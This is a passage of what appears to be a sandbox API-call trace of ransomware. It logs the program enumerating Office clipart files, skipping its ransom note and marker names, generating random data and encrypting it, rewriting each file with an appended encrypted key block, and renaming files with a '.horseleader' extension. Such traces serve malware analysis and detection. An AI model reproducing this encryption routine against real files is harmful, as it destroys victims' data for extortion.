lpOverlapped=0x0) returned 1 [0254.538] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.538] CloseHandle (hObject=0x158) returned 1 [0254.538] GetProcessHeap () returned 0x780000 [0254.538] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.538] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.horseleader") returned 79 [0254.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf.horseleader")) returned 1 [0254.539] GetProcessHeap () returned 0x780000 [0254.539] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.539] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbb4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01182_.WMF", cAlternateFileName="")) returned 1 [0254.539] lstrcmpiW (lpString1="DD01182_.WMF", lpString2="Windows") returned -1 [0254.539] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 67 [0254.539] StrStrIW (lpFirst="DD01182_.WMF", lpSrch=".horseleader") returned 0x0 [0254.539] lstrcmpW (lpString1="DD01182_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.539] lstrcmpW (lpString1="DD01182_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.539] lstrlenW (lpString=".testttjffg") returned 11 [0254.540] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.540] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.540] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.540] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.542] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 67 [0254.542] StrStrW (lpFirst="DD01182_.WMF", lpSrch=".txt") returned 0x0 [0254.542] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2996) returned 1 [0254.542] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xbb4, lpOverlapped=0x0) returned 1 [0254.579] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff44c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.579] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xbb4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xbb4, lpOverlapped=0x0) returned 1 [0254.579] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.579] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.580] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.580] CloseHandle (hObject=0x158) returned 1 [0254.580] GetProcessHeap () returned 0x780000 [0254.580] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.580] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.horseleader") returned 79 [0254.580] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf.horseleader")) returned 1 [0254.581] GetProcessHeap () returned 0x780000 [0254.581] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.581] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01183_.WMF", cAlternateFileName="")) returned 1 [0254.582] lstrcmpiW (lpString1="DD01183_.WMF", lpString2="Windows") returned -1 [0254.582] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 67 [0254.582] StrStrIW (lpFirst="DD01183_.WMF", lpSrch=".horseleader") returned 0x0 [0254.582] lstrcmpW (lpString1="DD01183_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.582] lstrcmpW (lpString1="DD01183_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.582] lstrlenW (lpString=".testttjffg") returned 11 [0254.582] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.582] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.582] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.582] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.583] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 67 [0254.583] StrStrW (lpFirst="DD01183_.WMF", lpSrch=".txt") returned 0x0 [0254.583] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2296) returned 1 [0254.583] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8f8, lpOverlapped=0x0) returned 1 [0254.595] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.595] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8f8, lpOverlapped=0x0) returned 1 [0254.595] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.595] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.595] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.595] CloseHandle (hObject=0x158) returned 1 [0254.596] GetProcessHeap () returned 0x780000 [0254.596] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.596] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.horseleader") returned 79 [0254.596] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf.horseleader")) returned 1 [0254.597] GetProcessHeap () returned 0x780000 [0254.597] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.597] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9936cb00, ftCreationTime.dwHighDateTime=0x1bd4c0e, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9936cb00, ftLastWriteTime.dwHighDateTime=0x1bd4c0e, nFileSizeHigh=0x0, nFileSizeLow=0x2174, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01186_.WMF", cAlternateFileName="")) returned 1 [0254.597] lstrcmpiW (lpString1="DD01186_.WMF", lpString2="Windows") returned -1 [0254.597] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 67 [0254.597] StrStrIW (lpFirst="DD01186_.WMF", lpSrch=".horseleader") returned 0x0 [0254.597] lstrcmpW (lpString1="DD01186_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.597] lstrcmpW (lpString1="DD01186_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.597] lstrlenW (lpString=".testttjffg") returned 11 [0254.597] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.597] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.597] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.597] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.598] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 67 [0254.598] StrStrW (lpFirst="DD01186_.WMF", lpSrch=".txt") returned 0x0 [0254.598] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8564) returned 1 [0254.598] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2174, lpOverlapped=0x0) returned 1 [0254.606] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffde8c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.606] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2174, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2174, lpOverlapped=0x0) returned 1 [0254.607] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.607] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.607] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.607] CloseHandle (hObject=0x158) returned 1 [0254.607] GetProcessHeap () returned 0x780000 [0254.607] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.607] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.horseleader") returned 79 [0254.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf.horseleader")) returned 1 [0254.608] GetProcessHeap () returned 0x780000 [0254.608] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.608] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4fe9900, ftCreationTime.dwHighDateTime=0x1c7a766, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4fe9900, ftLastWriteTime.dwHighDateTime=0x1c7a766, nFileSizeHigh=0x0, nFileSizeLow=0x6e8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01366_.WMF", cAlternateFileName="")) returned 1 [0254.608] lstrcmpiW (lpString1="DD01366_.WMF", lpString2="Windows") returned -1 [0254.608] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 67 [0254.608] StrStrIW (lpFirst="DD01366_.WMF", lpSrch=".horseleader") returned 0x0 [0254.608] lstrcmpW (lpString1="DD01366_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.608] lstrcmpW (lpString1="DD01366_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.608] lstrlenW (lpString=".testttjffg") returned 11 [0254.608] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.608] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.609] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.609] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0255.095] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 67 [0255.095] StrStrW (lpFirst="DD01366_.WMF", lpSrch=".txt") returned 0x0 [0255.095] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1768) returned 1 [0255.095] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x6e8, lpOverlapped=0x0) returned 1 [0255.103] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff918, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0255.103] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x6e8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x6e8, lpOverlapped=0x0) returned 1 [0255.106] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0255.106] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0255.106] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0255.106] CloseHandle (hObject=0x158) returned 1 [0255.106] GetProcessHeap () returned 0x780000 [0255.106] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0255.106] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.horseleader") returned 79 [0255.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf.horseleader")) returned 1 [0255.114] GetProcessHeap () returned 0x780000 [0255.115] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0255.115] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81594a00, ftCreationTime.dwHighDateTime=0x1bd4c02, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81594a00, ftLastWriteTime.dwHighDateTime=0x1bd4c02, nFileSizeHigh=0x0, nFileSizeLow=0x384, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01434_.WMF", cAlternateFileName="")) returned 1 [0255.115] lstrcmpiW (lpString1="DD01434_.WMF", lpString2="Windows") returned -1 [0255.115] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 67 [0255.115] StrStrIW (lpFirst="DD01434_.WMF", lpSrch=".horseleader") returned 0x0 [0255.115] lstrcmpW (lpString1="DD01434_.WMF", lpString2="#Decrypt#.txt") returned 1 [0255.115] lstrcmpW (lpString1="DD01434_.WMF", lpString2="_uninstalling_.png") returned 1 [0255.115] lstrlenW (lpString=".testttjffg") returned 11 [0255.115] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF", lpSrch=".testttjffg") returned 0x0 [0255.115] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0255.115] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0255.115] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0255.117] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 67 [0255.117] StrStrW (lpFirst="DD01434_.WMF", lpSrch=".txt") returned 0x0 [0255.117] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=900) returned 1 [0255.117] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x384, lpOverlapped=0x0) returned 1 [0255.176] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0255.176] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x384, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x384, lpOverlapped=0x0) returned 1 [0255.176] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0255.176] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0255.176] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0255.176] CloseHandle (hObject=0x158) returned 1 [0255.177] GetProcessHeap () returned 0x780000 [0255.177] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0255.177] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.horseleader") returned 79 [0255.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf.horseleader")) returned 1 [0255.178] GetProcessHeap () returned 0x780000 [0255.178] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0255.178] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55829800, ftCreationTime.dwHighDateTime=0x1bd4bf3, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x55829800, ftLastWriteTime.dwHighDateTime=0x1bd4bf3, nFileSizeHigh=0x0, nFileSizeLow=0x9dc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01585_.WMF", cAlternateFileName="")) returned 1 [0255.178] lstrcmpiW (lpString1="DD01585_.WMF", lpString2="Windows") returned -1 [0255.178] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 67 [0255.178] StrStrIW (lpFirst="DD01585_.WMF", lpSrch=".horseleader") returned 0x0 [0255.178] lstrcmpW (lpString1="DD01585_.WMF", lpString2="#Decrypt#.txt") returned 1 [0255.178] lstrcmpW (lpString1="DD01585_.WMF", lpString2="_uninstalling_.png") returned 1 [0255.178] lstrlenW (lpString=".testttjffg") returned 11 [0255.178] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF", lpSrch=".testttjffg") returned 0x0 [0255.178] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0255.179] CryptEncrypt (in: hKey=0x7c65a0, 